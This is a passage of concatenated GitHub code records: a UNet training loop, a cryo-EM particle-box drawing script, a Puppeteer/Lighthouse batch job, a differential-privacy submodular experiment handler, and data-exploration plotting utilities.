### initialize the network parameters, using Kaiming initialization here\n    def weight_init(self):\n        for m in self._modules:\n            weights_init_kaiming(m)\n\n\ndef weights_init_kaiming(m):\n    class_name = m.__class__.__name__\n    if class_name.find('Linear') != -1:\n        torch.nn.init.kaiming_normal_(m.weight)  # initialize with the Kaiming normal distribution\n        if m.bias is not None:\n            m.bias.data.zero_()\n    elif class_name.find('Conv2d') != -1:\n        torch.nn.init.kaiming_normal_(m.weight)\n        if m.bias is not None:\n            m.bias.data.zero_()\n    elif class_name.find('ConvTranspose2d') != -1:\n        torch.nn.init.kaiming_normal_(m.weight)\n        if 
m.bias is not None:\n            m.bias.data.zero_()\n    elif class_name.find('Norm') != -1:\n        m.weight.data.normal_(1.0, 0.02)\n        if m.bias is not None:\n            m.bias.data.zero_()\n\nif __name__ == '__main__':\n\n    UNet_model = UNet(3, 1)  # the input has 3 channels, the output has 1 channel\n    optimizer = optim.Adam(UNet_model.parameters(), lr=0.001, weight_decay=0.0001)\n    loss_func = nn.MSELoss(reduction='sum')\n    train_loss = 0\n\n    # run 100 simulated training iterations\n    for i in range(100):\n        ## simulated training data\n        img = torch.rand(2, 3, 600, 600)\n        ## simulated ground-truth labels\n        label = torch.rand(2, 1, 600, 600)\n        # forward pass of the model\n        img_pred = UNet_model(img)\n        loss = loss_func(label, img_pred)\n\n        ## backpropagation via the optimizer\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()  ## update the weights\n        train_loss += loss\n\n        # log the loss once every 10 training iterations\n        if i % 10 == 0:\n            print(\"iter:{},loss:{}\".format(i, train_loss / 10))\n            train_loss = 0\n\n\n","repo_name":"TianyiXiong1998/Projects-Repository","sub_path":"CU-net/Unet.py","file_name":"Unet.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"8483141404","text":"import cv2\nimport sys, os,getopt \nfrom mpi4py import MPI\nfrom EMAN2 import *\nimport numpy as np\ndef readStar(fin):\n    f=open(fin,'r');\n    l=f.readlines();\n    count=0;\n    for r in l:\n        s=r.split();\n        if len(s)>1:\n            c=s[0][1];\n            if c.isdigit()==1:\n                break;\n            count=count+1;\n        else:\n            count=count+1;\n\n    l=l[count:];\n\n    return l;\n\n\n\ndef normImg(img,n):\n    imax=np.max(img);\n    imin=np.min(img);\n    a=float(255)/(imax-imin);\n    b=(-1)*a*imin;\n\n    sizex=img.shape[0];\n    sizey=img.shape[1];\n    arr=np.zeros([sizex,sizey]);\n    arr=np.round(a*img+b).astype(int);\n\n    amax=np.max(arr);\n    amin=np.min(arr);\n    amean=np.mean(arr);\n    astd=np.std(arr);\n\n    bmin=amean-astd*n;\n    bmax=amean+astd*n;\n    c=float(255)/(bmax-bmin);\n    d=(-1)*c*bmin;\n\n    arr2=np.round(c*arr+d).astype(int);\n    for x in range(0,sizex):\n        for y in range(0,sizey):\n            if arr2[x,y]<0:\n                arr2[x,y]=0;\n            elif arr2[x,y]>255:\n                arr2[x,y]=255;\n\n    arr3=np.zeros([sizex,sizey,3]);\n    arr3[:,:,0]=arr2[:,:];\n    arr3[:,:,1]=arr2[:,:];\n    arr3[:,:,2]=arr2[:,:];\n\n    return arr3;\n\ndef norm(fin,n):\n    em=EMData(fin);\n    img=EMNumPy.em2numpy(em);\n    arr2=normImg(img,n);\n    return arr2;\n\ndef drawOri(im,cx,cy, sx,sy,count):\n    startx=cx-sx/2;\n    starty=cy-sx/2;\n    endx=cx+sx/2;\n    endy=cy+sx/2;\n\n    cv2.rectangle(im, (startx, starty), (endx, endy), (255,0,0), 2)\n\ndef draw(im,cx,cy, sx,sy,r,g,b,shape,r1,g1,b1):\n    startx=cx-sx/2;\n    starty=cy-sx/2;\n    endx=cx+sx/2;\n    endy=cy+sx/2;\n\n    w=3;\n\n    if shape==0:\n        cv2.rectangle(im, (startx, starty), (endx, endy), (b,g,r), w)\n    elif shape==1:\n        cv2.circle(im,(cx,cy), sx/2, (b,g,r), w)\n    elif shape==2:\n        cv2.rectangle(im, (startx, starty), (endx, endy), (b,g,r), w)\n        cv2.circle(im,(cx,cy), 10, (b1,g1,r1), w)\n\ndef getCors(fstar):\n    f=open(fstar,'r');\n    plist=f.readlines();\n    plist=plist[6:]\n    return plist;\n\n\ndef drawOne(fin,fstar,pSize,fout,start,stop, step,shape,arrColor,color):\n    plist=readStar(fstar);\n\n    if(fin[-3:]=='png'):\n        im = cv2.imread(fin);\n    elif (fin[-3:]=='mrc'):\n        im=norm(fin,2);\n    \n    sx=pSize;\n    sy=pSize;\n\n    sizex,sizey,sizez=im.shape;\n\n    count=0;\n    cx=0;\n    cy=0;\n    \n    index=0;\n    p=cp=0;\n    for line in plist:\n        if count>=start and count<stop:\n            s=line.split();\n            if len(s)>1:\n                x=float(s[0]);\n                x=int(x);\n                y=float(s[1]);\n                y=int(y);\n\n                if len(s)>=3:\n                    p=float(s[2])\n                else:\n                    p=1;\n\n                if len(s)==4:\n                    cp=float(s[3]);\n                else:\n                    cp=0;\n\n                if color==-1:\n                    index=int((count-20)/step);\n                    if index<0:\n                        index=0;\n                    elif index>9:\n                        index=9;\n                else:\n                    index=int(color);\n\n                
r,g,b=arrColor[index]\n\n                if color==-1:\n                    cdex=int((cp-0.5)*10);\n                    if cdex<0:\n                        cdex=0;\n                else:\n                    cdex=int(color);\n                r1,g1,b1=arrColor[cdex];\n\n                draw(im,x,y,sx,sy,r,g,b,shape,r1,g1,b1);\n        count=count+1;\n    \n    cv2.imwrite(fout,im);\n\n\ndef usage():\n    print(\"mpiexec -n 6 -i /home/ict/dataset/objEmDb/experiment/empiar10005/data2 \\\n        -o /home/ict/dataset/objEmDb/experiment/empiar10005/rec \\\n        -s /home/ict/dataset/objEmDb/experiment/empiar10005/autopick-results-by-demo-type3-iter1-2 \\\n        -p 200 -d\");\n\nif __name__==\"__main__\":\n    opts, args = getopt.getopt(sys.argv[1:], \"i:o:s:p:z:q:c:n:f:e:dmh\") \n    din=\"\" \n    dout=\"\"\n    dstar=\"\"\n    pSize=0;\n    isDir=0;\n    shape=0;\n    isMrc=-1;\n    start=30;\n    step=10;\n    color=-1;\n    stop=200000;\n\n    for op, value in opts: \n        if op == \"-i\": \n            din = value \n        elif op == \"-o\": \n            dout = value\n        elif op ==\"-s\":\n            dstar= value;\n        elif op ==\"-p\":\n            pSize=int(value)\n        elif op ==\"-z\":\n            start=float(value)\n        elif op ==\"-e\":\n            stop=float(value)\n        elif op ==\"-c\":\n            step=int(value)\n        elif op ==\"-q\":\n            color=int(value)\n        elif op ==\"-f\":\n            shape=int(value)\n        elif op==\"-d\":\n            isDir=1\n        elif op==\"-m\":\n            isMrc=1\n        elif op==\"-n\":\n            dnum=int(value);\n        elif op == \"-h\": \n            usage() \n            din='/home/ict/pickyEye/empiar10075/relion/pickyEye/empiar10075/data/FoilHole_19046908_Data_19046157_19046158_20140520_0021_frames_SumCorr.png'\n            dstar='/home/ict/pickyEye/empiar10075/relion/pickyEye/empiar10075/star/FoilHole_19046908_Data_19046157_19046158_20140520_0021_frames_SumCorr.star';\n            dout='./test.png'\n            start=50;\n            step=10;\n            shape=1;\n            pSize=300;\n\n    a=np.zeros([27,3]);\n    index =0;\n    \n    a[0]=255,0,0;\n    a[1]=0,0,255;\n    a[2]=0,255,0;\n    a[3]=255,0,255;\n    a[4]=0,255,255;\n    a[5]=255,255,0;\n    a[6]=75,0,130;\n    a[7]=0,100,0;\n    a[8]=128,0,0;\n    a[9]=128,128,0;\n    a[10]=0,0,0;\n    print(din,dout,dstar,pSize);\n    if isDir ==1:\n        comm=MPI.COMM_WORLD\n        crank=comm.Get_rank();\n        csize=comm.Get_size();\n\n        if crank==0:\n            if os.path.isdir(dout)==0:\n                os.mkdir(dout);\n        comm.barrier();\n\n\n        fins=os.listdir(dstar);\n        for i in range(crank,len(fins),csize):\n            f=fins[i];\n            if f[-4:]=='star' :\n                fin=f[:-5]+'.png';\n                fin=os.path.join(din,fin);\n\n                if os.path.exists(fin)==0:\n                    fin=f[:-5]+'.mrc';\n                    fin=os.path.join(din,fin);\n                if os.path.exists(fin)==1:\n                    fstar=os.path.join(dstar,f);\n                    fout=f[:-5]+'.png';\n                    fout=os.path.join(dout,fout);\n                    if os.path.exists(fstar)==1:\n                        print(fstar, fin);\n                        drawOne(fin,fstar,pSize,fout,start,stop, step, shape,a,color);\n            else:\n                print('no file:', fin);\n\n        comm.barrier();\n    else:\n        drawOne(din,dstar,pSize,dout,start,stop, step, shape,a,color);\n","repo_name":"smart111/PIXER","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"19995945799","text":"#!/usr/bin/env python3\nimport datetime\nimport glob\nimport logging\nimport os\nimport subprocess\nimport sys\nimport tarfile\n\nimport ncscli.batchRunner as batchRunner\n\n\nclass PuppeteerLighthouseFrameProcessor(batchRunner.frameProcessor):\n    '''defines details for using Puppeteer and Lighthouse to analyze a web page from multiple devices'''\n\n    def installerCmd( self ):\n        return 'apt-get -qq update > /dev/null && apt-get -qq install -y chromium nodejs npm > /dev/null && ln -s chromium /usr/bin/chromium-browser && PUPPETEER_SKIP_DOWNLOAD=yes npm install --quiet -g puppeteer && npm install --quiet -g lighthouse@6.5.0'\n\n    PuppeteerFilePath = 'Puppeteer.js'\n\n    def 
frameOutFileName( self, frameNum ):\n return 'Puppeteer_results_%03d.tar.gz' % frameNum\n\n def frameCmd( self, frameNum ):\n cmd = 'date && export NODE_PATH=/usr/local/lib/node_modules && export PATH=$PATH:/usr/local/bin && node %s && lighthouse https://www.google.com --no-enable-error-reporting --chrome-flags=\"--headless --no-sandbox\" --emulated-form-factor=none --throttling-method=provided && mv google.png google_%03d.png && mv *google*.html google_%03d.html && tar -zcvf Puppeteer_results_%03d.tar.gz google*' % (\n self.PuppeteerFilePath, frameNum, frameNum, frameNum\n )\n return cmd\n\ndef untarResults( outDataDir ):\n tarFilePaths = glob.glob( outDataDir+'/Puppeteer_results_*.tar.gz' )\n for tarFilePath in tarFilePaths:\n with tarfile.open( tarFilePath, 'r' ) as tarFile:\n try:\n tarFile.extractall( path=outDataDir )\n except Exception as exc:\n logger.warning( 'could not untar %s; %s', tarFilePath, exc )\n\n\n# configure logger formatting\n#logging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogFmt = '%(asctime)s %(levelname)s %(module)s %(funcName)s %(message)s'\nlogDateFmt = '%Y/%m/%d %H:%M:%S'\nformatter = logging.Formatter(fmt=logFmt, datefmt=logDateFmt )\nlogging.basicConfig(format=logFmt, datefmt=logDateFmt)\n#batchRunner.logger.setLevel(logging.DEBUG) # for more verbosity\n\ndateTimeTag = datetime.datetime.now().strftime( '%Y-%m-%d_%H%M%S' )\noutDataDir = 'data/puppeteer_' + dateTimeTag\n\ntry:\n rc = batchRunner.runBatch(\n frameProcessor = PuppeteerLighthouseFrameProcessor(),\n commonInFilePath = PuppeteerLighthouseFrameProcessor.PuppeteerFilePath,\n authToken = os.getenv( 'NCS_AUTH_TOKEN' ) or 'YourAuthTokenHere',\n encryptFiles=False,\n timeLimit = 80*60,\n instTimeLimit = 24*60,\n frameTimeLimit = 600,\n filter = '{ \"regions\": [\"usa\", \"india\"], \"dar\": \">= 99\", \"dpr\": \">=48\", \"ram\": \">=3800000000\", \"storage\": \">=2000000000\" }',\n outDataDir = outDataDir,\n startFrame = 1,\n endFrame = 5,\n nWorkers = 10,\n limitOneFramePerWorker = True,\n autoscaleMax = 2\n )\n if rc==0 and os.path.isfile( outDataDir +'/recruitLaunched.json' ):\n untarResults( outDataDir )\n rc2 = subprocess.call( [sys.executable, 'processPuppeteerOutput.py', '--dataDirPath', outDataDir],\n stdout=subprocess.DEVNULL )\n if rc2:\n logger.warning( 'processPuppeteerOutput exited with returnCode %d', rc2 )\n sys.exit( rc )\nexcept KeyboardInterrupt:\n logger.warning( 'an interuption occurred')\n","repo_name":"neocortix/ncscli","sub_path":"examples/batchMode/runBatchPuppeteerLighthouse.py","file_name":"runBatchPuppeteerLighthouse.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"33973922937","text":"import os\nfrom pydoc import cli\nimport random\nimport math\nimport numpy as np\nimport csv\nimport pickle\nimport time as tm\nimport multiprocessing as mp\nimport datetime\nfrom dpsm.Client import Client, dotProduct, Fast_Client\nfrom dpsm.FDP_Server import FDP, calc_kernel_radius, FDP_Lazy,FDP_PF\nfrom dpsm.CDP_Server import CDP\n\n\n\ndef read_dict(input_path: str):\n with open(input_path, \"rb\") as f:\n dic = pickle.load(f)\n return dic\n\n\ndef get_args_dict(dataset, algorithm, k, l, gamma, seed=0, epsilon=1, n=None, m=None, select_method=None, noise=None, cutoff=None, s=None, beta=None, save=True, fast=False,e0_ratio=None):\n dic = dict()\n dic[\"dataset\"] = dataset\n dic[\"algorithm\"] = algorithm\n dic[\"k\"] = k\n dic[\"epsilon\"] = epsilon\n dic[\"gamma\"] = gamma\n 
dic[\"save\"] = save\n dic[\"seed\"] = seed\n dic[\"l\"] = l\n dic[\"fast\"] = fast\n dic[\"save\"] = save\n if m is not None:\n dic[\"m\"] = m\n if n is not None:\n dic[\"n\"] = n\n\n if algorithm == \"Greedy\":\n dic[\"select_method\"] = \"greedy\"\n if algorithm == \"CDP\":\n if select_method is None:\n raise ValueError(\"Error: Missing parameter: select_method.\")\n dic[\"select_method\"] = select_method\n if algorithm == \"FDP\":\n if noise is None:\n raise ValueError(\"Error: Missing parameter: noise.\")\n dic[\"noise\"] = noise\n if algorithm == \"FDP_Lazy\":\n if noise is None:\n raise ValueError(\"Error: Missing parameter: noise.\")\n if cutoff is None:\n raise ValueError(\"Error: Missing parameter: cutoff.\")\n dic[\"noise\"] = noise\n dic[\"cutoff\"] = cutoff\n if algorithm == \"FDP_PF\":\n if cutoff is None:\n raise ValueError(\"Error: Missing parameter: cutoff.\")\n if e0_ratio is None:\n raise ValueError(\"Error: Missing parameter: e0_ratio.\")\n dic[\"cutoff\"] = cutoff\n dic[\"e0_ratio\"]=e0_ratio\n return dic\n\n\nclass Handler:\n def __init__(self, MaxP=10, save_path=\"res.csv\", res_fields=None, check_fields=None) -> None:\n self.MaxP = MaxP\n self.Pcnt = 0\n self.q = mp.Queue()\n self.save_path = save_path\n self.res_fields = res_fields\n if res_fields is None:\n self.res_fields = [\"dataset\", \"algorithm\", \"utility_func\", \"l\", \"seed\", \"n\", \"m\", \"k\", \"gamma\", \"epsilon\",\n \"delta\",\"epsilon_0\", \"delta_0\", \"sigma\",\"epsilon_1\",\"epsilon_2\", \"radius\", \"select_method\", \"noise\",\"e0_ratio\",\n \"cutoff\", \"sol\", \"result\", \"time\",\"communication_cost\"]\n self.args = dict()\n self.check_fileds = check_fields\n if check_fields is None:\n self.check_fileds = [\"dataset\", \"algorithm\", \"l\", \"seed\", \"n\", \"m\", \"k\", \"gamma\", \"epsilon\",\"e0_ratio\",\n \"select_method\", \"noise\", \"cutoff\"]\n self.exist_args = set()\n\n try:\n with open(self.save_path, 'r', newline='') as csvfile:\n print('file exists')\n except:\n with open(self.save_path, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self.res_fields)\n writer.writeheader()\n\n with open(self.save_path) as f:\n d = csv.DictReader(f)\n cnt = 0\n for row in d:\n dd = dict()\n for key in self.check_fileds:\n if key == \"epsilon\" or key == \"gamma\":\n dd[key] = str(float(row[key]))\n else:\n dd[key] = row[key]\n self.exist_args.add(str(dd))\n\n def start(self, args):\n self.args = args.copy()\n self.start_work()\n\n def start_work(self):\n if \"epsilon\" not in self.args:\n self.args[\"epsilon\"] = 1\n if self.existed(self.args):\n print(\"ARGS EXISTED. 
STOP RUNNING.\")\n return\n\n self.exist_args.add(str(self.args))\n mp.Process(target=self.work, args=(self.args, self.q)).start()\n self.Pcnt += 1\n self.wait(self.MaxP)\n\n def existed(self, args):\n nargs = dict()\n # print(\"nb\")\n for key in self.check_fileds:\n nargs[key] = '' if key not in args else str(args[key])\n if key == \"epsilon\" or key == \"gamma\":\n nargs[key] = str(float(nargs[key]))\n print(str(nargs))\n return str(nargs) in self.exist_args\n\n def wait(self, minp=1):\n\n while self.Pcnt >= minp:\n a = self.q.get()\n if \"Exist\" in a:\n self.Pcnt -= 1\n continue\n if a[\"save\"]:\n with open(self.save_path, \"a\", newline='') as f:\n fileds = self.res_fields\n w = csv.DictWriter(\n f, extrasaction=\"ignore\", fieldnames=fileds)\n w.writerow(a)\n self.Pcnt -= 1\n print(self.Pcnt,\" process(es) left.\")\n\n def work(self, args, q):\n random.seed(1)\n np.random.seed(1)\n\n random.seed(args[\"seed\"])\n np.random.seed(args[\"seed\"])\n\n items = read_dict(args[\"items_path\"])\n users = read_dict(args[\"users_path\"])\n\n if \"n\" not in args:\n args[\"n\"] = len(users)\n args[\"m\"] = len(items)\n\n args[\"delta\"] = 1/(args[\"n\"]**1.5)\n\n partition = [i % args[\"l\"] for i in range(args[\"n\"])]\n selected_user = [(1 if i < args[\"n\"] else 0)\n for i in range(len(users))]\n\n # shuffle and partition data\n random.shuffle(partition)\n #\n random.shuffle(selected_user)\n cnt = 0\n num = -1\n users_data = [dict() for i in range(args[\"l\"])]\n for key in users.keys():\n num += 1\n if selected_user[num] == 0:\n continue\n users_data[partition[cnt]][key] = users[key]\n cnt += 1\n\n # create client\n clients = []\n for i in range(args[\"l\"]):\n if args[\"fast\"] is True:\n clients.append(Fast_Client(users_data[i], items, args))\n else:\n clients.append(Client(users_data[i], items, args))\n if self.args[\"algorithm\"] != \"Greedy\":\n self.calc_parameters(args)\n\n func = None\n if args[\"algorithm\"] == \"Greedy\":\n func = CDP\n elif args[\"algorithm\"] == \"FDP\":\n func = FDP\n elif args[\"algorithm\"] == \"CDP\":\n func = CDP\n elif args[\"algorithm\"] == \"FDP_Lazy\":\n func = FDP_Lazy\n elif args[\"algorithm\"] == \"FDP_PF\":\n func=FDP_PF\n print(args)\n if self.existed(args):\n args[\"Exist\"] = True\n print(\"ARGS ALREADY EXIST. 
STOP RUNNING.\")\n q.put(args)\n return\n sol, time,comm_cost = func(items, args, clients)\n benefits = 0\n if args[\"fast\"] is False:\n for client in clients:\n benefits += sum(client.user_benefits.values())\n else:\n for client in clients:\n benefits += client.user_benefits\n args[\"sol\"] = sol\n args[\"result\"] = benefits\n args[\"time\"] = time\n args[\"communication_cost\"]=comm_cost\n print(str(datetime.datetime.now()),\" done:\", args)\n q.put(args)\n\n def F(self, t, a, b, c):\n return (t*a)/(b-(c/(t-1)))\n\n def logjc(self, n):\n s = 0\n for i in range(n):\n s += math.log(i+1)\n return s\n\n def calc_parameters(self, args):\n\n e = args[\"epsilon\"]\n if args[\"algorithm\"] == \"CDP\":\n k = args[\"k\"]\n elif args[\"algorithm\"] == \"FDP\":\n k = args[\"k\"]*args[\"m\"]\n elif args[\"algorithm\"] == \"FDP_Lazy\":\n k = args[\"m\"]+(args[\"k\"]-1)*args[\"cutoff\"]\n elif args[\"algorithm\"] == \"FDP_PF\":\n k= args[\"k\"]*args[\"cutoff\"]\n\n d = args[\"delta\"]\n gamma = args[\"gamma\"]\n\n basic_e = e/k\n basic_d = d/k\n\n adv_d = d/2\n a = k/2\n b = math.sqrt(2*k*math.log(1/adv_d))\n c = -e\n delta = b*b-4*a*c\n\n adv_e = (-b+math.sqrt(delta))/(a+a)\n print(\"basic_e:\", basic_e, \"basic_d:\", basic_d)\n print(\"adv_e:\", adv_e, \"adv_d:\", adv_d)\n\n if basic_e > adv_e:\n args[\"epsilon_0\"] = basic_e\n args[\"delta_0\"] = basic_d\n else:\n args[\"epsilon_0\"] = adv_e\n args[\"delta_0\"] = adv_d/k\n\n args[\"delta_0\"] /= gamma\n if args[\"algorithm\"]== \"FDP_PF\":\n args[\"epsilon_1\"] = math.log(1 + (math.exp(args[\"epsilon_0\"]*args[\"e0_ratio\"]) - 1) / gamma)\n args[\"epsilon_2\"] =math.log(1 + (math.exp(args[\"epsilon_0\"]*(1-args[\"e0_ratio\"])) - 1) / gamma) \n \n args[\"epsilon_0\"] = math.log(\n 1 + (math.exp(args[\"epsilon_0\"]) - 1) / gamma)\n if args[\"algorithm\"] == \"FDP\" or args[\"algorithm\"] == \"FDP_Lazy\":\n a = k*args[\"gamma\"]*args[\"gamma\"]\n b = args[\"epsilon\"]\n c = math.log(1/args[\"delta\"])\n # print(a,b,c)\n d = 1+c/b\n sigma = math.sqrt(a/b*(2*math.sqrt(d*d-d)+2*d-1)/2)\n args[\"sigma\"] = sigma\n print(\"sigma:\", sigma)\n","repo_name":"tc2000731/code-dpsm","sub_path":"dpsm/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":9292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42609092034","text":"import os\nimport shutil\nimport math\nimport numpy as np\nimport pandas as pd\nimport polars as pl\nfrom typing import List\nimport warnings\n\nfrom IPython.display import display, HTML\nimport plotly.graph_objects as go\nimport plotly.offline as py\nfrom plotly.subplots import make_subplots\n\nimport config\n\nHEIGHT_PLOT = 650\n\n\ndef describe_numeric(df, cols_num=None, percentiles=None, stats_nans=True):\n \"\"\"\n Describe numeric columns\n :param df: pandas data frame\n :param cols_num: numeric columns to describe, by default: identified automatically\n :param percentiles: percentiles to compute, default: [0.05, 0.25, 0.50, 0.75, 0.95]\n :return: pandas df with stats\n \"\"\"\n\n if isinstance(df, pd.Series) or isinstance(df, np.ndarray) or isinstance(df, list):\n df = pd.DataFrame({'value': df})\n\n if cols_num is None:\n cols_num = list(df.head(1).select_dtypes(include=['number']).columns)\n if percentiles is None:\n percentiles = [0.05, 0.25, 0.50, 0.75, 0.95, 0.98, 0.99]\n if len(cols_num) == 0:\n return None\n d_describe = df[cols_num].describe(percentiles=percentiles).T\n if stats_nans:\n d_describe['count_nan'] = df.isnull().sum()\n 
d_describe['prc_nan'] = 1 - d_describe['count'] / float(df.shape[0])\n    return d_describe\n\n\ndef describe_categorical(df, cols=None):\n    \"\"\"\n    Describe categorical columns\n    :param df: pandas data frame\n    :param cols: categorical columns to describe, by default: identified automatically\n    :return: pandas df with stats\n    \"\"\"\n    if cols is None:\n        cols = list(df.head(1).select_dtypes(include=['object']).columns)\n    if len(cols) == 0:\n        return None\n    d_describe = df[cols].astype('category').describe().T\n    return d_describe\n\n\ndef describe_categorical_freq(x: pd.Series, name: str = None, max_show: int = 10, min_prc: float = 0.001):\n    \"\"\"\n    Describe series with categorical values (counts, frequency)\n    :param x: series to describe\n    :param name: name\n    :param max_show: max values to show\n    :param min_prc: minimum size (in %) for the category to show in stats\n    :return: pandas df with stats\n    \"\"\"\n    if name is None:\n        try:\n            name = x.name\n        except:\n            name = 'value'\n    tmp = pd.DataFrame({name: x})\n\n    agg = tmp.groupby([name], dropna=False, as_index=True).agg({name: len}).rename(columns={name: 'count'})\n    agg['percentage'] = agg['count'] / sum(agg['count'])\n    agg.sort_values(['count'], ascending=False, inplace=True)\n    agg.reset_index(drop=False, inplace=True)\n    filter_out = (((agg['percentage'] < min_prc)\n                   & (pd.Series(range(len(agg))) > max_show))\n                  | (pd.Series(range(len(agg))) > max_show))\n    agg = agg.loc[~filter_out, ]\n    return agg\n\n\ndef display_descr_cat_freq(df, cols=None, skip_freq_cols=None, show_title=False):\n    \"\"\"\n    Describe categorical columns in dataframe (counts, frequency)\n    :param df: data frame\n    :param cols: for which columns to compute statistics, by default: identified automatically\n    :param skip_freq_cols: which columns to skip\n    :return: pandas df with stats\n    \"\"\"\n    if cols is None:\n        cols = list(df.head(1).select_dtypes(include=['object']).columns)\n    if skip_freq_cols is None:\n        skip_freq_cols = []\n    if len(cols) == 0:\n        return None\n    display(describe_categorical(df, cols))\n    for col in cols:\n        if col not in skip_freq_cols:\n            if show_title:\n                display(HTML(f'<br><b>{col}</b>'))\n            # else:\n            #     display(HTML('<br>'))\n            display(describe_categorical_freq(df[col]))\n\n\ndef set_display_options():\n    \"\"\"\n    Set display options for numbers, table width, etc.\n    :return: None\n    \"\"\"\n    pd.set_option('plotting.backend', 'plotly')\n    pd.set_option('display.max_rows', 100)\n    pd.set_option('display.max_columns', 50)\n    pd.set_option('display.width', 2000)\n    pd.set_option('display.max_colwidth', 150)\n    pd.set_option('max_colwidth', 150)\n    pd.set_option('display.precision', 2)\n    pd.set_option('display.chop_threshold', 1e-6)\n    # pd.set_option('expand_frame_repr', True)\n    pd.set_option('display.float_format', lambda x: '%.3f' % x)\n    warnings.simplefilter('ignore')\n    pl.Config.set_tbl_rows(10)\n    display(HTML(\"\"))\n\n\ndef get_last_commit_hash():\n    try:\n        import subprocess\n        result = subprocess.check_output(['git', 'log', '-1', '--pretty=format:\"%H\"'])\n        return result.decode('utf-8').replace('\"', '')[:8]\n    except Exception as e:\n        return None\n\n\ndef get_timestamp():\n    from datetime import datetime\n    return datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\n\ndef get_submit_file_name(prefix='submission', tag=None):\n    tag = '' if tag is None else f'-{tag}'\n    commit_hash = '' if get_last_commit_hash() is None else f'-{get_last_commit_hash()}'\n    timestamp = f'-{get_timestamp()}'\n    return f'{prefix}{timestamp}{tag}{commit_hash}'\n\n\ndef get_best_metric(lgbm_ranker):\n    try:\n        metric_, best_score = list(lgbm_ranker.best_score_['valid'].items())[0]\n    except (AttributeError, IndexError):\n        try:\n            metric_, best_score = list(lgbm_ranker.best_score_['train'].items())[0]\n        except:\n            metric_, best_score = 'NA', 'NA'\n\n    return metric_, best_score\n\n\ndef get_best_iter(lgbm_ranker):\n    best_iter = lgbm_ranker.best_iteration_ \\\n        if lgbm_ranker.best_iteration_ is not None \\\n        else lgbm_ranker.get_params().get('n_estimators')\n    return best_iter\n\n\ndef plot_forecast_in_out(self):\n    fig = go.Figure()\n    t = self.forecaster.target_name\n    fig.add_trace(\n        go.Scatter(\n            x=pd.to_datetime(np.concatenate([self.forecast_in['upgrade'], self.forecast_out['upgrade']])),\n            y=np.concatenate([self.forecast_in[t], self.forecast_out[t]]),\n            name=f\"actual {t}\", mode='lines', opacity=0.7,\n            line=dict(color='black', width=2))\n    )\n    fig.add_trace(\n        go.Scatter(\n            x=self.forecast_in['upgrade'], y=self.forecast_in[f'pred_{t}'],\n            name=f\"forecast in\", mode='lines', opacity=0.7, line=dict(color='green', width=2))\n    )\n    fig.add_trace(\n        go.Scatter(\n            x=self.forecast_out['upgrade'], y=self.forecast_out[f'pred_{t}'],\n            name=f\"forecast out\", mode='lines', opacity=0.7, line=dict(color='red', width=2))\n    )\n    fig.update_layout(title=self.forecaster_class.__name__, autosize=True, height=750,\n                      legend=dict(x=0, y=1, bgcolor='rgba(0,0,0,0)'))\n    py.iplot(fig)\n    # py.plot(fig)\n\n\ndef plot_multiple_cfips(df, measure='microbusiness_density', title=None, max_n=30, height=config.HEIGHT_PLOT_MEDIUM):\n    fig = go.Figure()\n\n    if title is None:\n        title = ', '.join(sorted(list(df['state'].unique())))\n\n    for cfips in sorted(list(df['cfips'].unique()))[:max_n]:\n        df_cfips = df.filter(pl.col('cfips') == cfips)\n        fig.add_trace(\n            go.Scatter(\n                x=df_cfips['first_day_of_month'],\n                y=df_cfips[measure],\n                name=cfips,\n                mode='lines',\n                opacity=0.7\n            )\n        )\n    fig.update_layout(\n        title=f'{title} - {measure}',\n        autosize=True,\n        height=height,\n        legend=dict(x=1, y=0, bgcolor='rgba(0,0,0,0)'),\n        yaxis={'title': measure},\n        margin=config.PLOT_MARGINS_MEDIUM,\n    )\n    py.iplot(fig)\n\n\ndef plot_multiple_cfips_microbiz_dens(df):\n    return plot_multiple_cfips(df, 
measure='microbusiness_density')\n\n\ndef plot_multiple_cfips_active(df):\n return plot_multiple_cfips(df, measure='active')\n\n\ndef plot_multiple_cfips_population(df):\n return plot_multiple_cfips(df, measure='population')\n\n\ndef plot_aggregated_cfips(df, title=None, measure='microbusiness_density', by='first_day_of_month',\n lo_q=0.25, mid='mean', hi_q=0.75, include_hi_lo=True, height=config.HEIGHT_PLOT_LOW):\n\n if title is None:\n title = ', '.join(sorted(list(df['state'].unique())))\n\n df_agg = df \\\n .groupby(by) \\\n .agg([pl.quantile(measure, hi_q).alias(f'q{hi_q * 100}'),\n pl.median(measure).alias('median'),\n pl.mean(measure).alias('mean'),\n pl.sum(measure).alias('sum'),\n pl.quantile(measure, lo_q).alias(f'q{lo_q * 100}'),\n ]) \\\n .sort(by)\n\n fig = go.Figure()\n fig.add_trace(\n go.Scatter(\n name=mid,\n x=df_agg['first_day_of_month'],\n y=df_agg[mid],\n mode='lines',\n line=dict(color='rgb(31, 119, 180)', width=3),\n showlegend=False\n )\n )\n\n if include_hi_lo:\n fig.add_trace(\n go.Scatter(\n name=f'q{hi_q * 100}',\n x=df_agg['first_day_of_month'],\n y=df_agg[f'q{hi_q * 100}'],\n mode='lines',\n marker=dict(color=\"#444\"),\n line=dict(width=0),\n showlegend=False\n )\n )\n\n fig.add_trace(\n go.Scatter(\n name=f'q{lo_q * 100}',\n x=df_agg['first_day_of_month'],\n y=df_agg[f'q{lo_q * 100}'],\n marker=dict(color=\"#444\"),\n line=dict(width=0),\n mode='lines',\n fillcolor='rgba(68, 68, 68, 0.3)',\n fill='tonexty',\n showlegend=False\n )\n )\n\n fig.update_layout(\n title=f'{title} - {measure}',\n autosize=True,\n height=height,\n yaxis_title=measure,\n hovermode=\"x\",\n margin=config.PLOT_MARGINS_SMALL,\n )\n py.iplot(fig)\n\n\ndef plot_aggregated_cfips_microbiz_dens(df):\n return plot_aggregated_cfips(df, 